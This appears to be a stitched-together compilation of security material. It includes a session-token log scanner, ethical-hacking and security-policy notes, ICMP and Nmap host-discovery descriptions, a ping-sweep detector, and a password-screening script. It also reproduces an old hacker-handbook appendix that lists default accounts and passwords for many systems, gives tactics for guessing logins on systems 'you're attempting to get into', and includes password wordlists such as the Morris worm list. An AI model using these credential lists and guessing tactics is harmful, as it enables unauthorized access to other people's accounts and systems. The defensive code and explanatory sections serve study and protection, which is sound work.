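198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-"
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /help HTTP/1.1" 200 300 "https://shop.example/account?sessionid=8f3a2c9d"
"""


def tokens_in_url(url):
    """Return {parameter: value} for every token-like identifier in a URL, whether
    sent as a query parameter (?sid=...) or as a path parameter (;jsessionid=...)."""
    parts = urlsplit(url)
    found = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in TOKEN_PARAMS:
            found[name] = values[0]
    m = re.search(r";(jsessionid)=([^;/?]+)", parts.path, re.IGNORECASE)
    if m:
        found[m.group(1)] = m.group(2)
    return found


def scan_log(text):
    """Flag requests whose URL or Referer carries a session token.

    A token in the URL lands in server logs, proxy logs and browser history and,
    through the Referer header, reaches whatever site the user clicks through to;
    each of those is a place an attacker with monitoring access can read it.
    """
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for location in ("target", "referer"):
            value = m.group(location)
            if value == "-":
                continue
            tokens = tokens_in_url(value)
            if tokens:
                hits.append({"ip": m.group("ip"), "location": location, "params": tokens})
    return hits


def session_cookie_header(token):
    """The mitigation: carry the session identifier in a cookie that scripts cannot
    read, that only travels over TLS and that is not attached to cross-site
    navigations, instead of in the URL."""
    return f"Set-Cookie: session={token}; Path=/; Secure; HttpOnly; SameSite=Strict"


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:14} token in {hit['location']}: {hit['params']}")
    print(session_cookie_header("<opaque-random-id>"))
```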
Skills of an Ethical Hacker

Ethical hacking is the legal hacking performed by a pen tester to find vulnerabilities in the information technology environment. In order to perform ethical hacking, the ethical hacker requires the skills of a computer expert. Ethical hackers should also have strong computer knowledge, including programming and networking. They should be proficient at installing and maintaining systems using popular operating systems (e.g. UNIX, Windows, or Linux). Detailed knowledge of hardware and software provided by popular computer and networking hardware vendors complements this basic knowledge. It is not always necessary that ethical hackers possess any additional specialization in security. However, it is an advantage to know how various systems maintain their security. Management skills pertaining to these systems are necessary for actual vulnerability testing and for preparing the report after the testing is carried out.
An ethical hacker should possess immense patience, as the analysis stage consumes more time than the testing stage. The time frame for an evaluation may vary from a few days to several weeks, depending on the nature of the task. When an ethical hacker encounters a system with which he or she is not familiar, it is imperative that the person takes the time to learn everything about the system and try to find its vulnerable spots.
Classification of Security Policies

Security policies are sets of policies that are developed to protect or safeguard a company's information assets, networks, etc. These policies are applicable to users, IT departments, the organization, and so on. For effective security management, security policies are classified into five different areas:

User Policy
- Defines what kind of user is using the network
- Defines the limitations that are applied on users to secure the network
- Ex: Password Management Policy

IT Policy
- Designed for an IT department to keep the network secure and stable
- Ex: backup policies, server configuration, patch updates, modification policies, firewall policies

General Policies
- Define the responsibility for general business purposes
- Ex: high-level program policy, business continuity plans, crisis management, disaster recovery

Partner Policy
- Policy that is defined among a group of partners

Issue-specific Policies
- Recognize specific areas of concern and describe the organization's status for top-level management
- Ex: physical security policy, personnel security policy, communications security
Types of Security Policies

A security policy is a document that contains information on the way the company plans to protect its information assets from known and unknown threats. These policies help to maintain the confidentiality, availability, and integrity of information. The four major types of security policies are as follows:

Promiscuous Policy
With a promiscuous policy, there is no restriction on Internet access. A user can access any site, download any application, and access a computer or a network from a remote location. While this can be useful in corporate businesses where people who travel or work at branch offices need to access the organizational networks, many malware, virus, and Trojan threats are present on the Internet. Due to free Internet access, this malware can come as attachments without the knowledge of the user. Network administrators must be extremely alert if this type of policy is chosen.

Permissive Policy
In a permissive policy, the majority of Internet traffic is accepted, but several known dangerous services and attacks are blocked. Because only known attacks and exploits are blocked, it is impossible for administrators to keep up with current exploits. Administrators are always playing catch-up with new attacks and exploits.

Prudent Policy
A prudent policy starts with all services blocked. The administrator enables safe and necessary services individually. This provides maximum security. Everything, such as system and network activities, is logged.

Paranoid Policy
In a paranoid policy, everything is forbidden. There is strict restriction on all usage of company computers, whether it is system usage or network usage. There is either no Internet connection or severely limited Internet usage. Due to these overly severe restrictions, users often try to find ways around them.
What Is Penetration Testing?

Penetration testing is a method of evaluating the security levels of a particular system or network. This helps you determine the flaws related to hardware and software. The early identification helps protect the network. If the vulnerabilities aren't identified early, then they become an easy source for the attacker for the intrusion. During penetration testing, a pen tester analyzes all the security measures employed by the organization for design weaknesses, technical flaws, and vulnerabilities. There are two types of testing: black box testing and white box testing. Black box testing simulates an attack from someone who is unfamiliar with the system, and white box testing simulates an attacker that has knowledge about the system. Once all the tests are conducted, the pen tester prepares a report and includes all the test results and the tests conducted along with the vulnerabilities found and the respective countermeasures that can be applied. Finally, the pen tester delivers the report to executive, management, and technical audiences.

Why Penetration Testing?

Penetration testing is required because it helps you to:
- Identify the threats facing an organization's information assets
- Reduce an organization's IT security costs and provide a better Return On Security Investment (ROSI) by identifying and resolving vulnerabilities and weaknesses
- Provide an organization with assurance: a thorough and comprehensive assessment of organizational security covering policy, procedure, design, and implementation
- Gain and maintain certification to an industry regulation (BS7799, HIPAA etc.)
- Adopt best practices by conforming to legal and industry regulations
- Test and validate the efficiency of security protections and controls
- Change or upgrade existing infrastructure of software, hardware, or network design
- Focus on high-severity vulnerabilities and emphasize application-level security issues to development teams and management
- Provide a comprehensive approach of preparation steps that can be taken to prevent upcoming exploitation
- Evaluate the efficiency of network security devices such as firewalls, routers, and web servers
Checking for Live Systems

ICMP Scanning

All required information about a system can be gathered by sending ICMP packets to it. Since ICMP does not have a port abstraction, this cannot be considered a case of port scanning. However, it is useful to determine which hosts in a network are up by pinging them all (the -P option does this; ICMP scanning is now in parallel, so it can be quick). The user can also increase the number of pings in parallel with the -L option. It can also be helpful to tweak the ping timeout value with the -T option.

ICMP Query

The UNIX tool ICMPquery or ICMPush can be used to request the time on the system (to find out which time zone the system is in) by sending an ICMP type 13 message (TIMESTAMP). The netmask on a particular system can also be determined with ICMP type 17 messages (ADDRESS MASK REQUEST). After finding the netmask of a network card, one can determine all the subnets in use. After gaining information about the subnets, one can target only one particular subnet and avoid hitting the broadcast addresses. ICMPquery has both a timestamp and an address mask request option:

icmpquery <query> [-B] [-f fromhost] [-d delay] [-T time] target

Where <query> is one of:
-t: icmp timestamp request (default)
-m: icmp address mask request
-d: delay to sleep between packets, in microseconds.
-T: specifies the number of seconds to wait for a host to respond. The default is 5.
A target is a list of hostnames or addresses.

Ping Scan Output Using Nmap

Source: http://nmap.org

Nmap is a tool that can be used for ping scans, also known as host discovery. Using this tool you can determine the live hosts on a network. It performs ping scans by sending ICMP ECHO requests to all the hosts on the network. If the host is live, then the host sends an ICMP ECHO reply. This scan is useful for locating active devices or determining if ICMP is passing through a firewall. The following screenshot shows the sample output of a ping scan using Zenmap, the official cross-platform GUI for the Nmap Security Scanner:
TCP/IP Packet

To understand ping, you should be able to understand the TCP/IP packet. When a system pings, a single packet is sent across the network to a specific IP address. This packet contains 64 bytes, i.e., 56 data bytes and 8 bytes of protocol header information. The sender then waits for a return packet from the target system. A good return packet is expected only when the connections are good and when the targeted system is active. Ping also determines the number of hops that lie between the two computers and the round-trip time, i.e., the total time taken by a packet for completing a trip. Ping can also be used for resolving host names. In this case, if the packet bounces back when sent to the IP address, but not when sent to the name, then it is an indication that the system is unable to resolve the name to the specific IP address.

Source: http://nmap.org

Using Nmap Security Scanner you can perform a ping sweep. A ping sweep determines the IP addresses of live hosts. This provides information about the live host IP addresses as well as their MAC addresses. It allows you to scan multiple hosts at a time and determine active hosts on the network. The following screenshot shows the result of a ping sweep using Zenmap, the official cross-platform GUI for the Nmap Security Scanner:
Ping Sweep Tools

Determining live hosts on a target network is the first step in the process of hacking or breaking into a network. This can be done using ping sweep tools. There are a number of ping sweep tools readily available in the market using which you can perform ping sweeps easily. These tools allow you to determine the live hosts by sending ICMP ECHO requests to multiple hosts at a time. Angry IP Scanner and Solarwinds Engineer's Toolset are a few commonly used ping sweep tools.

Angry IP Scanner

Source: http://www.angryip.org

Angry IP Scanner is an IP scanner tool. This tool identifies all non-responsive addresses as dead nodes, resolves hostname details, and checks for open ports. Its main features are scanning multiple ports and configurable scanning columns. Its main goal is to find the active hosts in the network by scanning all the IP addresses as well as ports. It runs on Linux, Windows, Mac OS X, etc. It can scan IP addresses ranging from 1.1.1.1 to 255.255.255.255.

Solarwinds Engineer's Toolset

Source: http://www.solarwinds.com

The Solarwinds Engineer's Toolset is a collection of network engineer's tools. By using this toolset you can scan a range of IP addresses and can identify the IP addresses that are in use currently and the IP addresses that are free. It also performs reverse DNS lookup.
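Added here as the defender's counterpart to the ping-sweep and ICMP-query techniques above (example code, not from the page or from any of the tools named): a Python detector that reads constructed firewall-style ICMP log lines and alerts when one source probes many distinct hosts within a short window, counting the echo, timestamp and address-mask requests described earlier; the log format, addresses and thresholds are assumptions made for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import NamedTuple

# ICMP request types that host-discovery tools send: echo (ping) plus the
# timestamp and address-mask requests that ICMPquery issues. Replies are ignored.
DISCOVERY_TYPES = {8: "echo", 13: "timestamp", 17: "address-mask"}

# Constructed log format (not any particular product's): an ISO timestamp followed
# by iptables-LOG-style key=value fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) .*SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=ICMP TYPE=(?P<type>\d+)"
)


class IcmpEvent(NamedTuple):
    ts: float
    src: str
    dst: str
    icmp_type: int


class SweepAlert(NamedTuple):
    src: str
    distinct_targets: int
    request_types: tuple


def parse_log(text):
    """Parse log lines into IcmpEvents, keeping only discovery-type requests."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        icmp_type = int(m.group("type"))
        if icmp_type not in DISCOVERY_TYPES:
            continue
        ts = datetime.fromisoformat(m.group("ts")).timestamp()
        events.append(IcmpEvent(ts, m.group("src"), m.group("dst"), icmp_type))
    return events


def detect_sweeps(events, threshold=8, window=10.0):
    """One alert per source that probes at least `threshold` distinct hosts within
    any `window` seconds. Targets are counted distinct, so a monitoring box that
    pings the same gateway repeatedly never crosses the threshold."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev.src].append(ev)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        recent = deque()            # events inside the sliding window
        peak, peak_types = 0, set()
        for ev in evs:
            recent.append(ev)
            while ev.ts - recent[0].ts > window:
                recent.popleft()
            targets = {e.dst for e in recent}
            if len(targets) > peak:
                peak = len(targets)
                peak_types = {DISCOVERY_TYPES[e.icmp_type] for e in recent}
        if peak >= threshold:
            alerts.append(SweepAlert(src, peak, tuple(sorted(peak_types))))
    return sorted(alerts)


def build_sample_log():
    """Constructed traffic (not real): a 12-host echo sweep, a 9-host timestamp
    sweep, and a monitoring host pinging one gateway three times (with replies)."""
    lines = []
    for i in range(12):
        lines.append(f"2023-10-10T13:55:{36 + i // 3:02d} fw kernel: IN=eth0 "
                     f"SRC=203.0.113.5 DST=10.0.0.{i + 1} PROTO=ICMP TYPE=8 CODE=0")
    for i in range(9):
        lines.append(f"2023-10-10T13:57:{10 + i:02d} fw kernel: IN=eth0 "
                     f"SRC=198.51.100.7 DST=10.0.0.{i + 20} PROTO=ICMP TYPE=13 CODE=0")
    for i in range(3):
        lines.append(f"2023-10-10T14:00:{i * 20:02d} fw kernel: IN=eth0 "
                     f"SRC=10.0.0.50 DST=10.0.0.1 PROTO=ICMP TYPE=8 CODE=0")
        lines.append(f"2023-10-10T14:00:{i * 20:02d} fw kernel: IN=eth0 "
                     f"SRC=10.0.0.1 DST=10.0.0.50 PROTO=ICMP TYPE=0 CODE=0")
    return "\n".join(lines)


if __name__ == "__main__":
    for alert in detect_sweeps(parse_log(build_sample_log())):
        print(f"sweep from {alert.src}: {alert.distinct_targets} hosts "
              f"via {', '.join(alert.request_types)}")
```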
Explanation of Some ASCII Codes

ASCII character code tables are very popular in computer books. Hardly a computer book has been written that doesn't have a list of ASCII codes, even if ASCII has nothing whatsoever to do with the book. Since ASCII tables are so prevalent, I'm not including a full one here. However, I'm giving you something much more useful to use in your hacking endeavors: an explanation of the non-printing ASCII characters. It's just about impossible to find a listing anywhere that tells you what these things do or mean. Usually you just see the abbreviations listed - cryptic codes like "ENQ," "SI" and "DC1." As you read through the list, try to think of ways you can use the information in your hacking. Remember, these codes may not be acknowledged by all remote computers, but often they will be valid, and can be strategically sent to make a computer think something is happening when in fact it is not.

0 NUL (NULL): No character; used for filling time in synchronous communication, or for filling in extra spaces on disk/tape when there is no data.
1 SOH (Start Of Heading): Indicates the start of a heading which contains addresses or routing information that applies to the text that follows the heading. (Control-A)
2 STX (Start of TeXt): Specifies the end of the heading, and the beginning of a block of text to which the heading applies. (Control-B)
3 ETX (End of TeXt): Indicates the end of the text that STX started. Often used as a break key. (Control-C)
4 EOT (End Of Transmission): A transmission may have included one or more "texts," each with a heading. Indicates the last text has been sent. Often used under UNIX to indicate the end of input. (Control-D)
5 ENQ (ENQuiry): A request for a response from the other end. It can be used as a "Who are you?" request for a station to identify itself. Might also be used to ask if a message has been received. (Control-E)
6 ACK (ACKnowledge): Character transmitted by a receiving device as affirmative response to sender. (Says, "Yep. I got the message.") Used as a positive response to an ENQ. (Control-F)
7 BEL (BELL): Used when there is need to call personnel's attention; may control alarm or attention devices. (Control-G)
8 BS (Back Space): Indicates the movement of the printing mechanism or display cursor one position back. (Control-H)
9 HT (Horizontal Tabulation): Moves cursor or print mechanism to next preassigned "tab" or stopping position. Often the same as pressing the Tab key. (Control-I)
10 LF (Line Feed): Moves printing mechanism or display cursor to start of next line. (Control-J)
11 VT (Vertical Tabulation): Moves print mechanism or display cursor to next series of preassigned printing lines. (Control-K)
12 FF (Form Feed): Moves printing mechanism or cursor to starting position of next page, screen or form. Often clears the display screen. (Control-L)
13 CR (Carriage Return): Moves to starting position of same line. Often corresponds to the Enter or Return key, or Control-M.
14 SO (Shift Out): Indicates that the code combinations which follow should be interpreted outside the standard character set until an SI is reached. (Control-N)
15 SI (Shift In): Indicates the code combinations which follow should be interpreted according to the standard character set. Sometimes aborts output while allowing the program to continue. (Control-O)
16 DLE (Data-Link Escape): Indicates the following character is a control code rather than data. (Control-P)
17 DC1, 18 DC2, 19 DC3, 20 DC4 (Device Controls): Characters for the control of ancillary devices or special terminal features. DC3 (Control-S) usually pauses local reception of output until a DC1 (Control-Q) is given. DC2 is Control-R. DC4 is Control-T.
21 NAK (Negative AcKnowledgment): Character transmitted by a receiving device as a negative response to an ENQ. A NAK says, "What'd ya say? I didn't quite catch it." (Control-U)
22 SYN (SYNchronous idle): Used in synchronous transmission systems to achieve synchronization. When no data is being sent, a synchronous transmission system may send SYN characters continuously. (Control-V)
23 ETB (End of Transmission Block): Indicates the end of a data block for communication purposes. Used for blocking data where block structure is not necessarily related to processing format. (Control-W)
24 CAN (CANcel): Data preceding it in a message or block should be disregarded, usually because an error has been detected. Sometimes used as an "abort transmission" command. (Control-X)
25 EM (End of Medium): Indicates physical end of a disk, tape or other medium, or end of the required or used portion of that storage medium. (Control-Y)
26 SUB (SUBstitute): Substituted for a character found to be erroneous or invalid. Sometimes used as a break command. (Control-Z)
27 ESC (ESCape): Character intended to provide code extension by giving alternate (usually control) meaning to characters that follow.
28 FS (File Separator), 29 GS (Group Separator), 30 RS (Record Separator), 31 US (Unit Separator): Information separators may be used in an optional manner except that their hierarchy is FS (most inclusive) to US (least inclusive).
32 SP (SPacebar)
127 DEL (DELete)

Common Defaults
These are words that are often used as default names and passwords. Try using various combinations of them as both name and password, then one as name and a different one as password, etc. Besides these, try using variations on the company name and the type of service it offers as names and/or passwords. Try things like putting a slash in front of words (such as "/guest"), or separating two words with a slash, as in "MAIL/company name." Also try putting spaces in the words (i.e., "New user") and varying capitalization (i.e., "NewUser," "newUser," etc.). Also worth trying are easily remembered numbers (1000, 99999, 12345, 101010, etc.), and repeated letters - if a password can be up to eight characters, try "XXXXXXXX," and other things like it. Don't forget single letters and digits, asterisks and other above-number characters, and plain 'n simple blank line Returns.

guest start accoun supruser visitor Su default superuser visit 0 a anonymous intro email x user demo use q demonstration mail enter Z instructions new newuser sysop introduction manager 1 password name test Sys system systest field temp instr passwd pswrd 9 startup id tty root go train trainer tempy training info
testing mini hello techsupport

Now here is a whole slew of defaults, common passwords and account names for different operating systems and other kinds of computers. Most are probably out of date or otherwise inoperable, but it gives you an idea of what is expected in these environments.

Credit Bureaus
TRW uses a password of the form "LLLNNNNNNNLNL" (example: abc123456d7e), where L is a letter of the alphabet and N is a digit. Note that the actual password does not have spaces between each letter and number.
For CBI, the passwords are "NNNLLNNN-??". Again, the Ns are numbers and the Ls are letters. A question mark refers to any character. Note the hyphen placed between the last digit and the first wild character.

DEC-10
UIC (User Identification Code) passwords:
1,2 syslib, operator, manager
2,7 maintain
5,30 games

FTP
Accounts: anonymous, guest, visitor
Password: Carriage Return

HP-X000 (MPS OS)
Login using "Hello [job ID],[Username][User Password].[Account Name],[Group Name][Group Password]"
Accounts:
Mgr.Telesup,hp3
Mgr.Telesup,hponly
Mgr.Telesup,pub
Mgr.Hpoffice,pub
Mgr.Rje,Pub
Manager.itf3000,pub
Field.support,pub (password: f1d, field)
Mail.telesup,pub (password: mail)
Mgr.rje
Field.hpp187
Field.hpp189
Field.hpp196
Field.support,pub
Hpoffice,pub

IRIS
Account names or passwords: manager, boss, software, demo, PDP8, PDP11, accounting

Libraries
Account names or passwords: library, syslib, lib, circ, cat, bib, biblio, catalog, file, minicirc

NOS
Accounts: $system, systemv
PRIMOS
Account names: admin, guest, prime, primenet, test, system, lib, dos
Passwords: system, sysman, netlink, primenet, manager, operator, prime, primos, primos-cs, test, guest

UNIX
Accounts or passwords: root, admin, sysadmin, Unix, UUCP, rje, guest, demo, daemon, sysbin, who, whois, time, date, ftp, anonymous

VM/CMS
Accounts or passwords: autolog1, autolog, cms, cmsbatch, erep, maintain, maint, operatns, operator, rscs, smart, sna, vmtest, vmutil, vtam, dial

VMS
Accounts or passwords: system, guest, default, operator, manager, syslib, uetp, sysmaint, service, digital, field, service, guest, demo, decnet, dec

What would you do if you dialed a number, got connected, and saw nothing but this:
#
on the screen? Out of security interests, many systems will not identify themselves or offer any text at all except a cursor and possibly a strange prompt. This is called "security through obscurity." In these frustrating instances you will have to try typing in every possible command you can think of until something works. This is a list of all the commands I remember being able to use in this sort of situation. Besides these words, if the system gives you any information at all, like company initials or weird words, try feeding back to it what it says to you. Sometimes commands must be preceded by a control character. For example, instead of typing "login," one types "/login." Unless the system specifically asks for something (like a log-on ID in a particular format) it's a good idea to try these commands, because you never know when one of them will work.

date list log man connect public page time load trace dir info open net login call begin sys a go h logon 1i show q state phone(s) help link mail print x control tele ? buy show @ bye email shell menu sell hint quit demo access demo start intro exit end run shed who whois on games calendar

Novice Word List

This is a list of words that turn up frequently as passwords. Using one of these as a password usually indicates a novice or disinterested computer user. In other words, if you happen to know a certain user is new to computing, either due to postings on a bulletin board, age, or whatever, then these are the words you would want to try. In addition to these words, you will want to try the letters of the alphabet, various combinations of letters and numbers, and things easily typed on a standard keyboard, such as "poiuy" and "yhnujm". Also for novices, try names and team names, cars, colors, animals, job-related words, pet names, music groups, local popular radio station call letters, local slang, names of cities or towns, company names, and names or types of computer. For parents, try things like "dad," "daddy," "mother," or "mommy." For people of certain occupations, something like "Dr. Daddy" may be more appropriate.

Two lists of words are given. The first is my own. The second, written by Robert Morris Jr., was used by the worm program that blazed through the Internet in 1988. Many of the words he used seem oddly chosen and superfluous, and there are many others which I can't understand why he did not include. I have it listed here mostly for historical reasons. I also think it's interesting to see how another hacker handles a situation. Duplications between the lists have been removed from my list.

My List:
account birthday disk adventure black diskette aid blue dollar aids book/s dumb alpha bowling earth angel brain eat
ass breast fish asshole car/s force bach Christmas Friday bard code fuck barf comp fucku baseball cow fuckyou basic crazy games basketball cunt go bboard darkstar god bbs dead golf beam death ham beta dick happy big disc hell hi nazi strike atmosphere clusters establish hitler no striker aztecs coffee estate hockey o.k. stupid azure coke euclid home okay suck bacchus collins evelyn hope open sun bailey commrades extension horses oreo sunshine banana computer fairway hump overload superbowl bandit condo felicia
id pass superman banks cookie fender ident penis system barber cooper fermat identify Pepsi talk baritone cornelius fidelity identity play television bass couscous finite in please tennis bassoon creation fishers intro print terminal batman creosote flakes keyboard printer test beater cretin float kill pswd tester beauty daemon flower king qwerty thanks beethoven dancer flowe kiss radar thunder beloved daniel foolproof later radio thunderbolt benz danny football life real tiger beowulf dave foresight lion red tincan berkeley december format little rex tits berliner defoe forsythe login run tv beryl deluge fourier logon Saturday tyger beverly desperate fred love sex universe bicameral develop friend manager shit user bob dieter frighten marijuana skull vagina brenda digital fun me smart white brian discovery fungible mensa snoopy who bridget disney gabriel
Mickey soccer word broadway dog gardner mine space world bumbling drought garfield modem spacebar yes burgess duncan fauss Monday starlight you campanile eager george money stars zoo cantor easier gertrude moon start cardinal edges ginger mouse startup carmen edinburgh glacier music stop carolina edwin gnu caroline edwina golpher cascades egghead gorgeous

Morris List:
castle eiderdown gorges cat eileen gosling aaa algebra answer cayuga einstein gouge academia aliases anthropoge cerulean elizabeth gryphon aerobics alphabet anvils change ellen guest airplane ama anything charles emerald guitar
albany amorphous aria charming engine gumption albatross analog ariadne charon engineer guntis albert anchor arrow chester enterpise hacker alex andromache arthur cigar enzyme hamlet alexander animals athena classic ersatz handily happening lynne Patricia Sal target harmony macintosh Peoria Saxon tarragon harold mack penguin scamper taylor harvey maggot persona scheme telephone hebrides malcolm percolate Scott temptation heinlein mark persimmon scotty thailand hello markus Pete secret tiger
help marty peter sensor toggle herbert marvin phoenix serenity tomato hibernia master Philip sharks topography honey maurice Pierre Sharon tortoise horus mellon pizza Sheffield toyota hutchins merlin plover Sheldon trails imbroglio mets Plymouth Shiva trivial imperial michael polynomial shivers trombone include michelle pondering shuttle tubas ingres mike pork signature tuttle inna minimum poster Simon umesh innocuous minsky praise simple unhappy irishman moguls precious singer unicorn isis moose prelude single unknown japan morley prince smile urchin jessica mozart Princeton smiles utility
jester nancy Protect smooch vacant jixian napoleon protozoa smother vertigo johnny nepenthe pumpkin snatch vicky joseph ness puneet snoopy village joshua network puppet soap virginia judith newton rabbit Socrates warren juggle next rachmaninoff sossina weenie julia nic rainbox sparrows whatnot kathleen noxious raindrop spit whiting kermit nutrition raleigh spring Whitney kernel nyquist random springer will kirkland oceanography rascal squires William knight ocelot really strangle Williamsburg ladle Olivetti rebecca Stratford Willie lambda Olivia remote Stuttgart Winston lamination oracle rick subway Wisconsin larkin orca ripple success wizard larry Orwell robotics
summer wombat lazarus Osiris rochester super woodwind lebesgue outlaw rolex Superstage wormwood lee oxford romano support yaco leland pacific ronald supported yang leroy painless rosebud surfer yellowstone lewis Pakistan rosemary Suzanne yosemite light Pam roses swearer zap lisa papers ruben symmetry zimmerman louis password rules tangerine

APPENDIX E: Job-Related Word List

These are passwords that might come up in a secretarial or office clerk setting. If the system you're attempting to get into is an office, it's a good idea to try these words before the novice list. For office settings, also try the company name and variations (initials, abbreviations), titles of software programs they might use there, and words related to that particular job.

spread memo info work spreadsheet/s wp comp job office word file doc paper/s file/s busy notes report/s sheet/s type document/s txt text enter dbase printer database print journal process desk desktop data write folders secretary computer term terminal news processor letter/s mail mailing business docs read stuff project labor public week day phone/s lotus 123 disk disc level service admin PC net network protect safe boss software IBM Friday accounting Monday book/s writer begin secretery
margin list field record check sec pres manage table clock

Technical Word List

Most people who use computers are just casual users, but then there are the power users - people like you - who know what they're doing and love doing it. These sorts of people are also often fond of ham radio, science fiction and fantasy, electronics, mathematics, chess, programming, and other related things. This list is comprised of words taken from some of these categories. Also try words from the Glossary. You'll notice that a lot of Star Trek words have been included here, as Star Trek is big among computer users.

abort ambassador atheist abortion anarchism attack absolut anarchy avatar absolute analog baggins access application band address arc bandwidth ai archive bang algorithm ascii barf alias async baud alpha atheism bbaggins bboard chomp erotics beam Christmas expert beamup cluster external berserk/er connect female biff cowboy foobar
Bilbo crack/er fractal Blast crunchy freq Board crusher frequency Bogon data frodo Bomb date fronteir Bones dbms frontier Bridge demigod function Broadcast demo gene Buzz devil generation Cable Diana genius cage digital go captain dipole god central director green chang dos grep channel dump grok chaos dvorak gronk chen ebdic group chess enterprise hack/er chief enterprize ham choke erotica hamradio hobbit oscillator szone home output tasha horizontal overheat tech host overload technical hotkey picard technician
human piggy test index power time input pres tng iris primos transport isis procedure transporter j1p prodigy travel kermit protocol trek king quartz treker kirk quattro trekie klingon query trekker Ian quit trekkie lang qwerty trekky language radio tribble/s laser random troy lee ravel tsupport lord register tyar male riker unix man robot var mark romulan variable mask romulon vax master romulun vector matrix rtty virus memory ryker VMS mensa scotty Vulcan menu scraft wan
modal shuttle Wang mode shuttlecraft warf model skip warp modem skipzone WC modulate space wheel moon speed wizard msdos spock worf nc-101 star worm net.god stars xmodem network startrek xterm next sting ymodem nil strek zmodem nill sttng yar nim Su zero node sundevil zoo null super object superuser ohm support OOP SWI operation synch
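As an added example that is not from the book or its author, the guessing heuristics of the Common Defaults paragraph (leading slash, inserted spaces, varied capitalization, repeated characters, easily remembered numbers, blank Returns) and the word lists that follow can be turned around into a password-screening rule set of the kind a registration or password-change handler runs before accepting a new password. The WEAK_WORDS excerpt, EASY_NUMBERS and the function names are constructed for this illustration and stand in for a full blocklist loaded from disk; the "word plus trailing digits" rule goes slightly beyond what the text spells out.

```python
import re
from typing import Optional

# Constructed excerpt of the appendix's default, novice, job and technical
# words; a real deployment loads the complete lists from a file.
WEAK_WORDS = {
    "guest", "password", "system", "manager", "operator", "test", "demo",
    "root", "admin", "new", "user", "newuser", "startup", "login", "hello",
    "mail", "secret", "spock", "trek", "office", "memo", "qwerty", "poiuy",
    "yhnujm", "company", "name",
}
EASY_NUMBERS = {"1000", "99999", "12345", "101010"}  # from the text


def parts_of(candidate: str) -> list:
    """Split on the separators the appendix says guessers insert (slash,
    space) and fold case, so "MAIL/Company" and "new User" screen the same."""
    return [p.lower() for p in re.split(r"[\s/]+", candidate) if p]


def weak_reason(candidate: str, blocklist=WEAK_WORDS) -> Optional[str]:
    """Return why a candidate password is weak, or None if it passes.
    Each rule is one of the appendix's guessing heuristics rewritten as a
    rejection rule applied at password-set time."""
    parts = parts_of(candidate)
    if not parts:
        return "blank (a bare carriage return would match)"
    joined = "".join(parts)
    if len(set(joined)) == 1:                      # "XXXXXXXX", "a", "7"
        return "single repeated character or digit"
    if joined.isdigit() and (joined in EASY_NUMBERS or len(joined) <= 6):
        return "easily remembered number"
    if joined in blocklist:                        # "/guest", "NewUser"
        return "common default, name or dictionary word"
    if all(p in blocklist or p in EASY_NUMBERS for p in parts):
        return "blocklist words joined with a slash or space"
    if joined.rstrip("0123456789") in blocklist:   # "spock1", "guest99"
        return "blocklist word with digits appended"
    return None


def screen(candidates: list) -> dict:
    """Screen a batch of candidates; None means the candidate was accepted."""
    return {c: weak_reason(c) for c in candidates}


if __name__ == "__main__":
    for pw, why in screen(["/guest", "MAIL/company name", "zq9!Lm#vR2"]).items():
        print(repr(pw), "->", why or "accepted")
```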